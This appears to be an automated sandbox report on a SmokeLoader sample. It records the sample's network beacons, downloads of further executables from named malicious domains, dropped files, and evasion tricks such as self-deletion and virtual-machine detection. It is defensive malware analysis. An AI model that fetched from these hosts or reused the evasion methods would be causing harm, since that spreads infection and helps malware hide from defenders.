            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:55:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 28 Dec 2021 12:56:01 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 28 Dec 2021 12:56:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 28 Dec 2021 12:56:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 28 Dec 2021 12:56:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Tue, 28 Dec 2021 12:55:13 GMT | Content-Type: text/html | Content-Length: 178 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 28 Dec 2021 12:56:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dbbxvwuoso.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: host-data-coin-11.com
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacytools-foryou-777.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match | File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: UZ6FEqlix4.exe, 00000000.00000002.674898642.000000000083A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: UZ6FEqlix4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402AB3
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402B2E
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402AB3
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402AB3
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: String function: 00426940 appears 133 times
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: String function: 00428320 appears 93 times
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402491 NtOpenKey,
Source: UZ6FEqlix4.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UZ6FEqlix4.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\411F.exe 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\eveggtb 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: UZ6FEqlix4.exe | Virustotal: Detection: 58%
Source: UZ6FEqlix4.exe | Metadefender: Detection: 20%
Source: UZ6FEqlix4.exe | ReversingLabs: Detection: 62%
Source: UZ6FEqlix4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Roaming\eveggtb | Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\AppData\Roaming\eveggtb | Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\eveggtb
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/3@24/5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UZ6FEqlix4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_004235C8 push eax; ret
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_008497BF push esi; ret
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_0084975A push esi; ret
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00401880 push esi; iretd
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 1_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\eveggtb | Code function: 11_1_00402E94 push es; iretd
Source: UZ6FEqlix4.exe | Static PE information: section name: .pejevu
Source: UZ6FEqlix4.exe | Static PE information: section name: .dozi
Source: 411F.exe.5.dr | Static PE information: section name: .pejevu
Source: 411F.exe.5.dr | Static PE information: section name: .dozi
Source: eveggtb.5.dr | Static PE information: section name: .pejevu
Source: eveggtb.5.dr | Static PE information: section name: .dozi
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: initial sample | Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample | Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample | Static PE information: section name: .text entropy: 6.87583252941
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\411F.exe

            Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\uz6feqlix4.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier read attributes | delete

            Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: eveggtb, 0000000B.00000002.781404615.0000000001F80000.00000004.00000001.sdmp | Binary or memory string: ASWHOOKZ
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\eveggtb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
